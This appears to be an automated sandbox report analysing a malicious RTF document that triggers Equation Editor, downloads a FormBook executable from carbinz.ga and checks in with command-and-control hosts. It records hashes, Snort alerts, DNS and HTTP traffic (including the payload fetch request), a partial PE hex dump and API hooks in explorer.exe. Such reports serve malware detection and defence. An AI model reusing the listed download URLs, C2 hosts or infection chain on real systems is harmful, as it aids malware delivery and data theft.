                                                                                                                                                                                                Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                                                                                                                                C:\Users\user\AppData\Roaming\prosper3512.exe
                                                                                                                                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):245650
                                                                                                                                                                                                Entropy (8bit):7.92465625934964
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3072:DQIURTXJ+McCmF7tC1eb4lhkULBwRLuJTqDW2CLd+d/Lpz3JAdFu4V65bRvSC5aL:Ds9cCmF5SnwvmLd+d/FcU4Y5bRvbRAaa
                                                                                                                                                                                                MD5:CB4947E5C78ADA624D22C28EE9079871
                                                                                                                                                                                                SHA1:EB2C2D329E9BE0B3A74582A4FD9C257BC795A690
                                                                                                                                                                                                SHA-256:02230FB80DB0FE0055730A0AF8B3A0C66A578B2C315206053B80BAE250C5561D
                                                                                                                                                                                                SHA-512:7582AED1984C65C550532AB4A97D6BC5BC45BFCEEACDF329467B39667DBCAAA6A28175AA29FEF30146E16CBDAE903C5381B3D1EA47888F8D29B9F4119A581B26
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                C:\Users\user\Desktop\~$B00028487364 -000487449287.doc
                                                                                                                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):162
                                                                                                                                                                                                Entropy (8bit):2.431160061181642
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                                                                                                                                MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                                                                                                                                SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                                                                                                                                SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                                                                                                                                SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                General

                                                                                                                                                                                                File type:Rich Text Format data, unknown version
                                                                                                                                                                                                Entropy (8bit):5.218652093822829
                                                                                                                                                                                                TrID:
                                                                                                                                                                                                • Rich Text Format (5005/1) 55.56%
                                                                                                                                                                                                • Rich Text Format (4004/1) 44.44%
                                                                                                                                                                                                File name:AWB00028487364 -000487449287.doc
                                                                                                                                                                                                File size:5618
                                                                                                                                                                                                MD5:1ec3b91ed189962f5dbab025347f11a9
                                                                                                                                                                                                SHA1:4abe9e2631f5c2ef5e3c979e5845b460e8448658
                                                                                                                                                                                                SHA256:472ee2b8c300718535b7c997c3a7884c125bb697feb4969a3002355d04e4050c
                                                                                                                                                                                                SHA512:a9d44e69f0b1182519fe3610e856b7cb46ebadb34370240753168bac4921f66e21f9b49030b83fa8b4503b8823c23b8f18b661004a90a9e5f236e2950d7b048f
                                                                                                                                                                                                SSDEEP:96:WFm/QH53bUFmB2/wMGbF8LAGUSeJqWHUeeKuInmNzPlq2llPIEhIOaU6tKwFjRC+:WxrU0BcGaYqWHUeeKuIizVDIEqOqKSRF
                                                                                                                                                                                                File Content Preview:{\rtf7975'_-!#&.]~/[!5^^)?.@8'!?9==985~_..#9@.5?[=!$:??',2-.(]_@%@?8.%|;.;['6-,,@&4>$%^=726?;('8^,7%))91.$9#>4(..5)6.8&:^41<59|0]`!7*!].;..+?.$5#?612+>?.=,<?~)(?-7(]+.>!!-@,!'.?&[,@._.@+].*9?^;.~(288>.(3|#5|6+670./@60)*%%&:9?%!.!?`=%-@0|?<:(!_3-<0`]888,4.

                                                                                                                                                                                                File Icon

                                                                                                                                                                                                Icon Hash:e4eea2aaa4b4b4a4

                                                                                                                                                                                                Static RTF Info

                                                                                                                                                                                                Objects

                                                                                                                                                                                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                                                                                                                                000000641hno
                                                                                                                                                                                                1000005FDh2embeddedeqUATion.31417no

                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                Snort IDS Alerts

                                                                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                06/10/21-16:23:26.694312TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22142.250.180.211
                                                                                                                                                                                                06/10/21-16:23:26.694312TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22142.250.180.211
                                                                                                                                                                                                06/10/21-16:23:26.694312TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.22142.250.180.211

                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Jun 10, 2021 16:22:07.813637972 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.864141941 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.864238977 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.864707947 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.915879011 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.916915894 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.916939020 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.916955948 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.916971922 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.916980028 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917001963 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917006016 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917094946 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917112112 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917136908 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917144060 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917154074 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917160988 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917174101 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917188883 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917318106 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917361021 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917366028 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.917397976 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.926475048 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968086958 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968111992 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968127966 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968146086 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968166113 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968188047 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968190908 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968234062 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968250036 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968270063 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968272924 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968287945 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968295097 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968311071 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968339920 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968365908 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968388081 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968405962 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968410015 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968422890 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968430996 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968446970 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968461037 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968604088 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968637943 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968671083 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968687057 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968703032 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968709946 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968724966 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968734980 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968811989 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968847036 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968867064 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968883991 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968899965 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968909025 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.968929052 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.969537973 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:07.969551086 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020128965 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020159960 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020180941 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020201921 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020246029 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020267010 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020689011 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020714998 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020730972 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020737886 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020749092 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020760059 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020770073 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020791054 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020893097 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020920038 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020935059 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020941019 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020953894 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020962000 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020976067 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.020997047 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021058083 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021084070 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021092892 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021106005 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021117926 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021126986 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021138906 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021162987 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021208048 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021234989 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021244049 CEST4916580192.168.2.22185.239.243.112
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021259069 CEST8049165185.239.243.112192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:08.021276951 CEST4916580192.168.2.22185.239.243.112

                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Jun 10, 2021 16:22:07.654036999 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                Jun 10, 2021 16:22:07.732378006 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:22:07.732547998 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                                                                Jun 10, 2021 16:22:07.794118881 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:23:26.535474062 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                                                                Jun 10, 2021 16:23:26.613518953 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:23:47.506222010 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                                                                Jun 10, 2021 16:23:47.581491947 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                                                                Jun 10, 2021 16:24:08.273709059 CEST6120053192.168.2.228.8.8.8
                                                                                                                                                                                                Jun 10, 2021 16:24:08.341054916 CEST53612008.8.8.8192.168.2.22

                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                                Jun 10, 2021 16:22:07.654036999 CEST192.168.2.228.8.8.80x2c09Standard query (0)carbinz.gaA (IP address)IN (0x0001)
                                                                                                                                                                                                Jun 10, 2021 16:22:07.732547998 CEST192.168.2.228.8.8.80x2c09Standard query (0)carbinz.gaA (IP address)IN (0x0001)
                                                                                                                                                                                                Jun 10, 2021 16:23:26.535474062 CEST192.168.2.228.8.8.80xa14dStandard query (0)www.pwagih.comA (IP address)IN (0x0001)
                                                                                                                                                                                                Jun 10, 2021 16:23:47.506222010 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.centerstageacademyaz.comA (IP address)IN (0x0001)
                                                                                                                                                                                                Jun 10, 2021 16:24:08.273709059 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.skip1-dndasasd.comA (IP address)IN (0x0001)

                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                Jun 10, 2021 16:22:07.732378006 CEST8.8.8.8192.168.2.220x2c09No error (0)carbinz.ga185.239.243.112A (IP address)IN (0x0001)
                                                                                                                                                                                                Jun 10, 2021 16:22:07.794118881 CEST8.8.8.8192.168.2.220x2c09No error (0)carbinz.ga185.239.243.112A (IP address)IN (0x0001)
                                                                                                                                                                                                Jun 10, 2021 16:23:26.613518953 CEST8.8.8.8192.168.2.220xa14dNo error (0)www.pwagih.comghs.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                Jun 10, 2021 16:23:47.581491947 CEST8.8.8.8192.168.2.220x2e78No error (0)www.centerstageacademyaz.comcenterstageacademyaz.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                Jun 10, 2021 16:23:47.581491947 CEST8.8.8.8192.168.2.220x2e78No error (0)centerstageacademyaz.com184.168.131.241A (IP address)IN (0x0001)
                                                                                                                                                                                                Jun 10, 2021 16:24:08.341054916 CEST8.8.8.8192.168.2.220x2f03Name error (3)www.skip1-dndasasd.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                • carbinz.ga
                                                                                                                                                                                                • www.centerstageacademyaz.com

                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                0192.168.2.2249165185.239.243.11280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Jun 10, 2021 16:22:07.864707947 CEST0OUTGET /modex/prosperx.exe HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                Host: carbinz.ga
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Jun 10, 2021 16:22:07.916915894 CEST2INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 10 Jun 2021 14:22:07 GMT
                                                                                                                                                                                                Content-Type: application/x-msdownload
                                                                                                                                                                                                Content-Length: 245650
                                                                                                                                                                                                Last-Modified: Wed, 09 Jun 2021 23:32:39 GMT
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                ETag: "60c14f97-3bf92"
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 b8 84 3a 75 d9 ea 69 75 d9 ea 69 75 d9 ea 69 b6 d6 b5 69 77 d9 ea 69 75 d9 eb 69 ee d9 ea 69 b6 d6 b7 69 64 d9 ea 69 21 fa da 69 7f d9 ea 69 b2 df ec 69 74 d9 ea 69 52 69 63 68 75 d9 ea 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c6 e3 1a 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d4 01 00 00 04 00 00 3c 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 5a 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 c0 02 00 00 0a 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 8b 0d a8 3e 42 00 89 48 04 50 ff 75 10 ff 75 0c ff 75 08 ff 15 48 72 40 00 e9 42 01 00 00 53 56 8b 35 b0 3e 42 00
                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1:uiuiuiiwiuiiidi!iiitiRichuiPELK\<2p@sp.textZZ\ `.rdatap`@@.datar@.ndata@.rsrcv@@U\}t+}FEuH>BHPuuuHr@BSV5>B


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                1192.168.2.2249167184.168.131.24180C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Jun 10, 2021 16:23:47.782058954 CEST304OUTGET /hlx/?5jSp=B58lx/xfXHfuM7XpBg0CPLD4IpEHx1MuvfPUCu/nTzR4B4jEH/TGM7WOLp8Aty+Q3gKYZw==&JR-laV=zN90U HTTP/1.1
                                                                                                                                                                                                Host: www.centerstageacademyaz.com
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                Jun 10, 2021 16:23:48.005733013 CEST305INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                Server: nginx/1.16.1
                                                                                                                                                                                                Date: Thu, 10 Jun 2021 14:23:47 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Location: http://centerstage.academy/hlx/?5jSp=B58lx/xfXHfuM7XpBg0CPLD4IpEHx1MuvfPUCu/nTzR4B4jEH/TGM7WOLp8Aty+Q3gKYZw==&JR-laV=zN90U
                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Code Manipulations

                                                                                                                                                                                                User Modules

                                                                                                                                                                                                Hook Summary

                                                                                                                                                                                                Function NameHook TypeActive in Processes
                                                                                                                                                                                                PeekMessageAINLINEexplorer.exe
                                                                                                                                                                                                PeekMessageWINLINEexplorer.exe
                                                                                                                                                                                                GetMessageWINLINEexplorer.exe
                                                                                                                                                                                                GetMessageAINLINEexplorer.exe

                                                                                                                                                                                                Processes

                                                                                                                                                                                                Process: explorer.exe, Module: USER32.dll
                                                                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE2
                                                                                                                                                                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE2
                                                                                                                                                                                                GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE2
                                                                                                                                                                                                GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE2

                                                                                                                                                                                                Statistics

                                                                                                                                                                                                Behavior

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                Analysis Process: WINWORD.EXE PID: 1924 Parent PID: 584

                                                                                                                                                                                                General

                                                                                                                                                                                                Start time:16:21:35
                                                                                                                                                                                                Start date:10/06/2021
                                                                                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                                                                Imagebase:0x13f620000
                                                                                                                                                                                                File size:1424032 bytes
                                                                                                                                                                                                MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                Analysis Process: EQNEDT32.EXE PID: 1296 Parent PID: 584

                                                                                                                                                                                                General

                                                                                                                                                                                                Start time:16:21:36
                                                                                                                                                                                                Start date:10/06/2021
